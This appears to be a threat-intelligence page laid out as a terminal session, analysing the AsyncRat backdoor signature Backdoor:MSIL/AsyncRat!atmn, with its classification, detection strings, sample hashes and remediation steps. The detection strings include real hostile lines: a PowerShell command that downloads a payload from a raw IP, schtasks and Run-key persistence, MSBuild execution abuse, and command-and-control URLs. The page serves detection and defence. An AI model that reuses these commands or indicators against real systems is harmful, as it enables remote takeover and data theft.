user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Backdoor:MSIL/AsyncRat!atmn
Backdoor:MSIL/AsyncRat!atmn - Windows Defender threat signature analysis

Backdoor:MSIL/AsyncRat!atmn - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Backdoor:MSIL/AsyncRat!atmn
Classification:
Type:Backdoor
Platform:MSIL
Family:AsyncRat
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!atmn
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Backdoor - Provides unauthorized remote access for .NET (Microsoft Intermediate Language) platform, family AsyncRat

Summary:

Backdoor:MSIL/AsyncRat!atmn is a concrete detection of the AsyncRat Remote Access Trojan (RAT), a sophisticated .NET-based malware. It establishes persistence, abuses legitimate tools like MSBuild.exe for execution, encrypts its communication, and connects to command-and-control servers for data exfiltration and full remote control over the compromised system.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
 - Set fso = CreateObject("Scripting.FileSystemObject") (PEHSTR_EXT)
 -  & "\ (PEHSTR_EXT)
 - .xml" (PEHSTR_EXT)
 - Set object_Shell = CreateObject("Shell.Application") (PEHSTR_EXT)
 - object_Shell.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  (PEHSTR_EXT)
 - COM Surrogate (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - https://ufile.io/rftaeqtc (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - http://serverupdates48.ga/test (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - CarRentalSystem\obj\Debug\Dash.pdb (PEHSTR_EXT)
 - crypted.exe (PEHSTR_EXT)
 - sqkpikos.pdb (PEHSTR_EXT)
 - HCS Computers & Laptops (PEHSTR_EXT)
 - Client.Install (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - System.Windows.Forms (PEHSTR_EXT)
 - System.Reflection (PEHSTR_EXT)
 - B.text (PEHSTR_EXT)
 - setUTCMinutesTU Jurassic.Library.JSFunctionFlags (PEHSTR_EXT)
 - calc_pro.Form1.resources (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - get_Computer (PEHSTR_EXT)
 - Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - windwos.My (PEHSTR_EXT)
 - 134.122.133.49 (PEHSTR_EXT)
 - Client.bin (PEHSTR_EXT)
 - Select * From Win32_ComputerSystem (PEHSTR_EXT)
 - Dotfuscated\CryptoObfuscator_Output\v4.pdb (PEHSTR_EXT)
 - v4.Resources.resources (PEHSTR_EXT)
 - windwos.pdb (PEHSTR_EXT)
 - petrolmanagementsystem.Supplier_withdraw_pump_bank_detail.resources (PEHSTR_EXT)
 - \x64\Release\WechatAnd.pdb (PEHSTR_EXT)
 - windwos\bin\Debug\Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - RAT\AsyncRat_0313\rat_Client\rat_pro\obj\Debug\rat_pro.pdb (PEHSTR_EXT)
 - 9ubmFjIG1hcmdvcnAgc2loVCHNTAG4Ic (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - \RatClientTest.pdb (PEHSTR)
 - Ymcfcbdts.Properties (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR)
 - RunHiddenCommand (PEHSTR)
 - RawAccel.exe (PEHSTR)
 - seftali\x64\Release\seftali.pdb (PEHSTR_EXT)
 - loader\x64\Release\Espio.pdb (PEHSTR_EXT)
 - powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin') (PEHSTR_EXT)
 - schtasks /create /f /sc onlogon /rl highest /tn (PEHSTR_EXT)
 - Stub.exe (PEHSTR_EXT)
 - nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
 - Skipping Annabelle.exe (PEHSTR_EXT)
 - powershell.exe (PEHSTR_EXT)
 - ExecutionPolicy Bypass -File (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: Stub.exe
cd4dad081f725dfbfb7a953be2d375e642cb70b31c657855f6acb0b6f1cb0a4f
27/01/2026
VirusTotalDownload Sample
Filename: Stub.exe
ab04fc3cbe5aa5f61e603328969673d027d82a27a5958f669893bb8f3cf66cba
27/01/2026
VirusTotalDownload Sample
Filename: Stub.exe
6d7d65abe6b704d342f890c901fbfbdfd1306c3ff9a7395d780743322ed2211c
27/01/2026
VirusTotalDownload Sample
Filename: Stub.exe
5c986bec02b7db3e84afddbd548832630870da9966bbd3062ced1f2e8a2efd31
27/01/2026
VirusTotalDownload Sample
477c09a67603a4b499b7c20cdbff58f33522dc86dac5af5fb6688daae57fbc05
21/01/2026
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the infected system from the network. Perform a full system scan using up-to-date antivirus software, remove all detected malicious files, and investigate for any remaining persistence mechanisms or signs of lateral movement. Reset all user credentials associated with the compromised system.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 18/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$